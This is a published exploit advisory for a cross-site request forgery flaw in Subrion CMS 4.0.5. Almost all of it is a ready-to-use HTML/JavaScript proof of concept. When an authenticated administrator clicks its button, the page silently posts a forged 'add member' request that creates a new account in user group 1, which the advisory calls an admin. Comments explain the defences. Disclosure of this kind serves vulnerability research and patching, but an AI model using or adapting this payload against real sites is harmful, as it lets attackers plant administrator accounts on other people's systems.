
# Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-01-05
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://intelliants.com/
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
# Software : Subrion CMS
# Product Version: v 4.0.5.10
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# A CSRF vulnerability was discovered in Subrion CMS v4.0.5.
# Through this vulnerability, a new user account can be added to the system via the browser of an authenticated administrator.
HTML CSRF PoC :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
// CSRF proof of concept: when a Subrion administrator who is logged in loads
// this page and clicks the button, the browser issues a cross-origin POST to
// the admin "members/add" handler with the administrator's cookies attached,
// replaying a captured "add member" form submission. SERVER is a placeholder
// for the vulnerable host. The defence is a per-session anti-CSRF token that
// the server verifies on every state-changing admin request, together with
// SameSite session cookies.
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
// The body is hand-built multipart/form-data; the boundary declared here must
// match the one used in every part of the body below.
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
// Sends the victim's session cookies with the cross-origin request, which is
// what makes this a CSRF. A session cookie marked SameSite=Lax or Strict would
// not be attached to a cross-site POST like this one.
xhr.withCredentials = true;
var body = "-----------------------------9973334999367242361642875270\r\n" +
// "__st" carries a fixed value that looks like a form/anti-CSRF token.
// NOTE(review): because the PoC hard-codes it, the endpoint presumably does
// not bind this value to the victim's session; confirm against the 4.0.5
// source before relying on that reading.
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"ismailtasdelen\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Ismail Tasdelen\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"test@mail.com\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"Test1234!\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"Test1234!\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
// usergroup_id=1 is presumably the administrator group, given the advisory
// title "Add Admin"; the group numbering is not shown on this page.
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"https://ismailtasdelen.com\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"0000000000000000000\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"NULL\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"plan_id\"\r\n" +
"\r\n" +
"2\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
"\r\n" +
"2020-02-05 05:18:43\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2020-02-05 05:19\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------9973334999367242361642875270\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------9973334999367242361642875270--\r\n";
// Copies the string into a byte array one char code at a time and sends it as
// a Blob, so the multipart body goes out as raw bytes exactly as captured
// rather than being re-encoded by the browser. The body above is pure ASCII,
// so each char code is a single byte.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>